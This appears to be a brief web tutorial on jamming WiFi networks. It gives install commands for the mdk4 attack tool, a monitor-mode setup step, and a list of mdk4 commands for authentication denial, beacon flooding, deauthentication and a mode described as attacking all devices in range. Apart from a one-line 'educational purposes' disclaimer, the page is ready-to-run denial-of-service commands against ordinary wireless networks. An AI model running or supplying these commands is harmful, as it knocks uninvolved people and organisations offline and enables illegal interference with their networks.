How to DOS a WiFi

How to DOS a WiFi Network
Disclaimer: Everything on this site is for educational purposes and should not be used for evil.
Installation:
apt update && apt upgrade
apt-get install pkg-config libnl-3-dev libnl-genl-3-dev libpcap-dev
git clone https://github.com/aircrack-ng/mdk4
cd mdk4
make
sudo make install
How to use:
airmon-ng start wlan0
Modes:
mdk4 wlan0mon a - Authentication Denial-of-Service
mdk4 wlan0mon b - Beacon Flooding
mdk4 wlan0mon b -ams 500 - crashes a WiFi network
mdk4 wlan0mon d - Deauthentication and Dissociatation
mdk4 wlan0mon f -sap -m bmstm -p 400 - DOS attack to all devices in range

Comments